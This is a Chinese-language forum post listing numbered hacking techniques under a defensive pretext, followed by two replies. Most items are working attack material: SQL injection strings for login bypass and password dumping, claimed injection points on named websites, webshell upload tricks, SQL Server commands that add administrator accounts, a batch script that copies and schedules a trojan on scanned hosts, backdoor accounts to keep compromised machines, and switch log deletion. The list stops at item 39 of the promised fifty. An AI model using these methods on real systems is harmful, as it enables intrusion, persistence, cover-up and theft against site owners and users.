[交流] 黑客入侵網絡的50種方法

黑客入侵網絡的50種方法



現在網上的攻擊事件越來越多，黑客都是通過什麼方法來攻擊我們的呢？下面我們給大家總結了黑客入侵網絡的五十種方法，讓大家做到有備無患。
　　1.網寬網絡有限公司製作的網站基本都有注入漏洞 搜索網寬網絡

　　2.搜索欄裡輸入

　　關鍵字%'and 1=1 and '%'='

　　關鍵字%'and 1=2 and '%'='

　　比較不同處 可以作為注入的特徵字符

　　3.登陸框用戶名和密碼輸入'or'='or' 漏洞很老但是現在很是遍地都是

　　4.我們先到www.google.com底下搜索一下co net mib ver 1.0

　　密碼帳號都是 'or'='or'

　　5.掛馬代碼

　　6.http://www.wyyfk.com/24小時掛qq工具

　　7.開啟regedt32的sam的管理員權限 檢查hkey_local_machine\sam\sam\和hkey_local_machine\sam\sam\下的管理員和guest的f鍵值,如果一樣就是用被入侵過了,然後刪了guest帳號,對方可以用guest帳號使用administraeors的權限,你也可以用這方法留住肉雞,這方法是簡單克隆,

　　net localgroup administrators還是可以看出guest是管理員來

　　7.只要敢想,新浪也可入侵 注入點

　　http://igame.sina.com.cn/plaza/e ... iew.asp?event_id=59

　　微軟官方網站注入點

　　http://www.microsoft.com/library ... =iso-8859-1&qu=

　　8.ms05016攻擊工具用法 mshta.exe test.hta 文件名.後綴名 可以綁上qq大盜木馬

　　9.有sa權限sqlserver數據庫、並且能sql注入支持fso+asp的服務器

　　sql注入後，如何上傳木馬,

　　文章地址 http://hack123.home4u.china.com/0601.htm

　　10.qq強制聊天代碼

　　http://wpa.qq.com/msgrd?v=1&uin=對方的qq號&site=ioshenmue&menu=yes

　　使用方法：把代碼中的紅色的「********」星號換成你想與其聊天的qq號後復 制到瀏覽器的地址欄處即可。無論他是否你的好友，你無須加他為好友就能給 他發qq消息。

　　11. mybbs論壇cookie欺騙 後台備份馬

　　12.軟件instsrv.exe 把.exe文件做成系統服務來啟動 用來肉雞掛qq等

　　用法: 安裝： instsrv.exe 服務名稱 路徑

　　卸載： instsrv.exe 服務名稱 remove

　　13.以動網為例數據庫查找dv_log,在上面的查詢的字段名裡選l_content後面的關鍵字填上password2,找到的username2=%b7%e7%a4%ce%b0%d7%d2%c2&password2=01180017&username1=%b7%e7%a4%ce%b0%d7%d2%c2&submit=%cc%ed+%bc%d3 password2=01180017就是他的登陸密碼

　　14.搜索的技巧 inurl:網址

　　15.啟航工作室wms 5.0網站程序漏洞

　　在baidu 搜索powered by: sailingstudio website manage system 5.0 (sp1)

　　利用動畫看http://soft.77169.com/62/20050530/6824.html

　　16.很多網站程序(比如華碩中文官方網站)上傳圖片時有可能在檢測文件的時候是 從左朝又進行檢測，也就是說，他會檢測文件是不是有.jpg，那麼我們要是把文件改成：ating.jpg.asp試試。。由於還是asp結尾，所以木馬不會變~

　　17.天意商務系統網上依然有 有漏洞 網站具體的樣式http://www.wzgcc.org/

　　工具下載www.hack6.com

　　地址欄裡，填上天意商務系統的網址就可以了，注意一定要是主頁面

　　18.sql注入時工具---internet選項---高級裡找到顯示友好的錯誤信息勾去掉

　　不能注入時要第一時間想到%5c暴庫

　　19.這個dbinbd.asp文件插入後門的功能適用於文件名為.asp的所有access數據庫不是動網論壇也一樣可以使用的,後門隱蔽，幾乎發現不了

　　工具使用方法動畫和所有文件

　　http://www.anquanwu.com/bbs/printpage.asp?boardid=2&id=811

　　20.缺少xp_cmdshell時

　　嘗試恢復exec sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'

　　假如恢復不成功,可以嘗試直接加用戶(針對開3389的)

　　declare @o int

　　exec sp_oacreate 'wscr?pt.shell',@o out

　　exec sp_oamethod @o,'run',null,'cmd.exe /c net user ating ating /add' 再提到管理員


      21.批量種植木馬.bat ★黑客基地個人空間★-博客-日誌b1U%s-] z ^1G


　　for /f %%i in (掃瞄地址.txt) do copy pc.exe %%i\admin$ 複製木馬到掃瞄的計算機當中

　　for /f %%i in (掃瞄地址.txt) do at %%i 09:50 pc.exe 在對方計算機上運行木馬的時間

　　掃瞄地址.txt裡每個主機名一行 用\\開頭

　　22.搜索 powered by discuz!4.0.0rc3 開放頭像的可利用 工具地址www.hack6.com

　　23.dv7.1用還原數據功能 還原asa木馬

　　24.凡人網絡購物系統v6.0 可以%5c暴庫

　　25.ipb2.0.2漏洞 構造語句

　　$qpid=1) and 1=2 union select 1,2,3,4,5,6,7,8,9,10,member_login_key,12,13,14,15,16,17,18,19,1 from ibf_members where id=1 /* 暴管理員密碼 想看動畫到黑基裡找 ipb<= 2.0.3論壇注入工具 www.hack6.com有下載

　　26. 將工具傳到郵箱 在下載上右擊 複製快捷方式 擁有自己了的下載空間

　　27.北京沖qb要寬帶號跟綁定寬帶的後4位電話,當你掃出北京款待號的密碼必須是8位的密碼,而且開頭是6或8的才可以,因為北京的電話都是6根8開頭的而且都是8位的,北京的區名海澱 東城 西城 門頭溝 豐台 潮陽 宣武 通州 昌平,去http://cnc.qq.com/bbn/沖

　　28.搜索 企業網絡辦公系統 添'or''=' 登陸 在個人郵箱 上傳asp木馬

　　29.本人原創 搜索"一點點星空驛站 留言本" 默認數據庫是gbmdb.mdb 很多網站用這個留言本 但是用搜索引擎搜不到 可以給大家在入寢時多個思路

　　30.在程序上傳shell過程中，程序不允許包含標記符號的內容的文件上傳,比如藍屏最小 的asp木馬,我們來把他的標籤換一下： 保存為.asp,程序照樣 執行.

　　31.目錄權限設置變態的話可以用一些方法(比如serv-u溢出)將此web用戶提權 可訪問全站目錄掛馬

　　32.喜歡網頁掛馬的看看這篇總結文章吧

　　http://77169.com/news/hk/2005060611656.html

　　33.搜索"images/admin" 或".tw/images/admin" 可以找到些台灣的數據庫

　　34.iis6 for windows 2003 enterprise edition 如iis發佈目錄文件夾包含.asp後輟名.

　　將.asp後輟改為.jpg或其它的如.htm,也可以運行asp,但要在.asp文件夾下.

　　.cer 等後綴的文件夾下都可以運行任何後綴的asp木馬

　　35.telnet一台交換機 然後在telnet控制主機 控制主機留下的是交換機的ip

　　然後用#clear logg和#clear line vty *刪除日誌

　　36.搜索關鍵字:"copyright 2003-2004 動易網絡" 後面地址改成upfile_soft.asp 這樣的漏洞很多

　　37.bbsxp的漏洞總結 powered by bbsxp 5.15/licence blog.asp中的對id 的過濾不嚴的漏洞 拿到管理員的前後台密碼 工具：bbsxp完全版 cookies 欺騙 bbsxp 過濾了 asp 文件的上傳 所以我們這裡用 asa 來傳馬

　　38.學會總結入侵思路http://www.77169.com/news/hk/2005060811688.html

　　39.電腦壞了省去重新安裝系統的方法

　　純dos下執行，

　　xp:copy c:\windows\repair\*.*

怎么算了一下不到50种呢？

朋友你的帖子违反第七条版规了(7.黑客类的工具教程一律不允许发。)
小心被罚哦!